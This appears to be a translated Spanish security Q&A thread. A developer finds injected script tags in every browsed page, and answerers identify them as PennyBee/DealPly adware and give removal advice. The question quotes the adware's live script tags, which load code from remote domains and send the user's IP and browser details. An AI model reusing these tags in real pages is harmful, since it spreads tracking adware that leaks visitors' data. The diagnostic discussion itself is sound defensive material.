¿Cuáles son estas URL en mis navegadores?

6

Estaba probando mi aplicación Node.JS . Cuando abrí mi aplicación usando Chrome y Mozilla, vi estos archivos JS incluidos en cada página que navego. Aparecen en todos los navegadores que utilizo (Firefox, Chrome).

<script type="text/javascript" src="http://j.midnightjs.net/omeltest/common.js?appTitle=PennyBee&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5"></script><scriptsrc="//q.pricejs.info/e?type=quick&amp;topic=suzan_commonjs&amp;partner=omeltest&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;trinity=Z15e3d535a5k&amp;appTitle=PennyBee&amp;opdom=midnightjs.net&amp;instgrp=&amp;rnd=0.5035031025763601&amp;guid=" type="text/javascript"></script>
<script src="//h.midnightjs.net/e?type=heart_bit&amp;partner=omeltest&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;trinity=Z15e3d535a5k&amp;appTitle=PennyBee&amp;opdom=midnightjs.net&amp;instgrp=&amp;sset=4&amp;cb=114_9_25&amp;src=midn8&amp;userAgent=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F38.0.2125.104%20Safari%2F537.36" type="text/javascript"></script>
<script src="http://i.omeljs.info/omeltest/javascript.js?channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;instgrp=&amp;trinity=Z15e3d535a5k"type="text/javascript"></script> 
<script src="http://i.omeljs.info/opt_content.js?v=opt_1412683513880&amp;partner=omeltest&amp;channel=omeltestchkomel68&amp;sset=8&amp;appTitle=&amp;sset=8&amp;ip=5.47.69.10"></script><scriptsrc="http://c.omeljs.info/1507367.js?dn=10.6&amp;isc=0" type="text/javascript" id="__DealPly__222918.92021894455" class="dealply_content_script"></script>

Noté que esos enlaces están enviando mi IP y otros datos a servidores remotos. ¿Es este un virus y cómo puedo deshacerme de él?

    
pregunta nodejser 25.10.2014 - 13:09
fuente

4 respuestas

10

Parece que tu escritorio está infectado con el adware PennyBee (también conocido como DealPly, OfferBoulevard, SavingsBull).

En teoría, esto generalmente puede eliminarse mediante el uso de la entrada Agregar o quitar programas y los administradores de extensiones / complementos en Chrome y Firefox. Sin embargo, si sin saberlo, fue infectado por esto (probablemente: a través del programa de agrupación InstallCore / OpenCandy / DownloadAdmin ejecutado por IronSource / Injekt, parte del grupo como se ejecuta PennyBee et al), ¿quién sabe qué más se ha instalado? Podría valer la pena considerar una instalación nueva.

    
respondido por el bobince 26.10.2014 - 13:45
fuente
0

Esto parece ser una infección del adware del navegador. Estos adwares actúan como Man-in-the-Browser y se activan en ciertos eventos, como hacer clic con el mouse. Una vez que el evento se activa, generan tráfico a un sitio web arbitrario. Para deshacerse de esto, considere volver a instalar su navegador web. Para obtener una mirada más cercana, intente ver los diferentes complementos instalados en su navegador. Si encuentra algún complemento sospechoso que se haya instalado accidentalmente, desactívelo inmediatamente. Pero esto no será una solución permanente. Cambiar a un navegador diferente que se instaló antes de que ocurriera la infección tampoco ayudará, ya que estos programas generalmente se instalan en todos los navegadores disponibles en la máquina.

    
respondido por el abhinav singh 27.10.2014 - 12:39
fuente
0

Para ver si esta infección es más ancha que la instalación de su navegador, cree un nuevo usuario, explore algunos sitios web y vea si el nuevo usuario también se infecta. En ese caso, limpiar su navegador no ayudará.

    
respondido por el SPRBRN 27.10.2014 - 13:41
fuente
-1

No sería capaz de comentar si el JS conectado a tus sesiones de navegación es realmente malicioso o no, pero puedo ofrecerte algunos consejos que te darán más control sobre la superficie de ataque de tu Firefox El navegador presenta a los adversarios potenciales.

Si tiene alguna duda acerca de la confiabilidad (o la intención maliciosa) de un URI, intente buscarlo en sitios como enlace ( para más sitios que ofrecen un servicio similar, intente buscar en Google esto: "relacionado: www.virustotal.com").

También, viendo que esto es un problema de JS; puede intentar instalar el complemento NoScript para FireFox. Este complemento le da control sobre qué orígenes del navegador pueden ejecutar JS y otro contenido activo en su navegador. Y si le preocupa ser rastreado y filtrar datos sobre su actividad a sitios web desconocidos, puede probar a usar el complemento Lightbeam para Firefox.

    
respondido por el k3170makan 25.10.2014 - 16:51
fuente

Lea otras preguntas en las etiquetas